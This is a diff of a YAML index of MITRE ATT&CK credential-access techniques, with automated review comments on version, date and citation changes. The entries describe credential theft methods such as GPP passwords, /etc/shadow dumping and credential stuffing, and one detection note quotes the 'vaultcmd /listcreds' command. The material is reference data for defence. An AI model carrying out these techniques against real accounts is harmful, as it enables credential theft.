Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46852,25 +47578,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
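Review bot: the T1556.008 `modified` timestamp moves backwards, from `2023-10-31T14:00:00.188Z` to `2023-05-04T18:02:51.318Z`. A regression in `modified` usually means the generator was run against a different upstream bundle than the previous index; confirm this matches the current ATT&CK STIX data rather than a stale local copy before merging. The T1552.006 body above it follows the same pattern as T1552.003: `x_mitre_permissions_required: - User` removed, `revoked: false` added, spec version 2.1.0 to 3.2.0, references re-ordered with unchanged content.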
@@ -46945,11 +47700,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46993,11 +47747,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -47021,8 +47774,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
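Review bot: the `GitHub AWS-ADFS-Credential-Generator` citation now points at `https://github.com/pvanbuijtene/aws-adfs-credential-generator` while the description still credits Damian Hickey and the old URL was under `damianh`. A citation URL moving to a different GitHub owner deserves a check that it comes from the upstream ATT&CK bundle (the retrieval date change to September 27, 2024 suggests it does) and not from a hand edit of the index.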
@@ -47038,11 +47791,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -47053,11 +47805,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -47067,16 +47821,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -47114,13 +47868,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -47129,6 +47880,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -47136,11 +47888,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -47158,13 +47910,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -47177,6 +47926,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -47190,12 +47940,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -47227,17 +47978,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -47310,12 +48058,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47324,6 +48071,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -47342,18 +48090,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -47377,13 +48125,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47409,6 +48154,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -47420,18 +48166,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -47450,14 +48196,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47486,24 +48229,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -47538,13 +48283,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47622,14 +48364,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -47645,6 +48386,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47653,13 +48395,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -47667,15 +48409,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -47686,9 +48424,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -47734,7 +48471,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
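Review bot: the T1557.002 `modified` timestamp also regresses here, from `2022-11-08T14:00:00.188Z` to `2022-07-22T18:37:22.176Z`, the same pattern as T1556.008 earlier in this change. Please confirm against the upstream bundle that these objects were not refreshed and the older date is the authoritative one.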
@@ -47753,17 +48490,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
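Review bot: T1557.002 keeps `x_mitre_attack_spec_version: 2.1.0` (context line at the top of this hunk) while losing `spec_version`, whereas every other object in this change is bumped to 3.2.0. Either ARP Cache Poisoning really was not updated upstream, which is consistent with its `modified` date moving backwards in the previous hunk, or the generator missed it; worth a quick check. The `Azure AD` to `Entra ID` rename inside the T1556.009 description string is an upstream text change and needs no action.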
@@ -47796,10 +48532,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
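Review bot: the T1556.009 platform list drops `SaaS` as well as `Azure AD`, and only `Identity Provider` is added; every other platform rewrite in this change keeps `SaaS` and replaces `Azure AD` one-for-one. Confirm the SaaS removal is intentional in the upstream v1.1 object rather than an artifact, since a SaaS-keyed index would silently lose Conditional Access Policies.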
@@ -47836,11 +48571,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47908,34 +48642,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47944,20 +48654,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -47989,7 +48721,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -48015,13 +48747,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
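Review bot: T1558.002 removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement line, while still keeping `x_mitre_permissions_required: - User`, which the other objects in this change drop. Together with the `modified` date going backwards in the previous hunk (`2021-04-29` to `2020-03-25`), this looks like an object the upstream bundle did not refresh; if the attack spec version is not re-emitted elsewhere in the object, Silver Ticket ends up with no spec version at all, which is worth confirming before merge.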
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
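Review bot: for T1558.002 this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` without adding a replacement `x_mitre_attack_spec_version`, whereas the other techniques in this diff move to 3.2.0; together with the regressed `modified` date in the previous hunk, T1558.002 looks like it was regenerated from a different source object than its siblings and deserves a second look before merge. The T1555.004 `modified` update at the bottom of the hunk is fine.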
@@ -48038,24 +48768,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
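Review bot: this hunk is a pure key reorder for T1555.004 (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique` and `x_mitre_platforms` change position with identical values); emitting keys in a stable order from the generator would remove this churn from future regenerations and make the real changes, such as the version bumps, easier to review. The `x_mitre_detection` context lines also carry stray line breaks where inline code spans used to be (`vaultcmd.exe` / `for suspicious activity`), which is pre-existing but worth handling wherever the description text is sanitised.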
@@ -48096,36 +48826,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
